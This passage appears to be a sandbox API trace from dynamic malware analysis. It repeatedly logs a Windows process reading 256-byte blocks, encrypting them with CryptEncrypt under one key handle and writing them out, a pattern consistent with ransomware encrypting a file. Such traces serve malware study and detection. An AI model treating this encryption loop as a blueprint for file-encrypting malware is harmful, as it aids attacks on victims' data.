[0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.657] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.657] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.657] GetLastError () returned 0x0 [0151.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.658] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.658] GetLastError () returned 0x0 [0151.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.658] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.659] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.659] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.659] GetLastError () returned 0x0 [0151.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.660] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.660] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.660] GetLastError () returned 0x0 [0151.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.661] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.661] GetLastError () returned 0x0 [0151.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 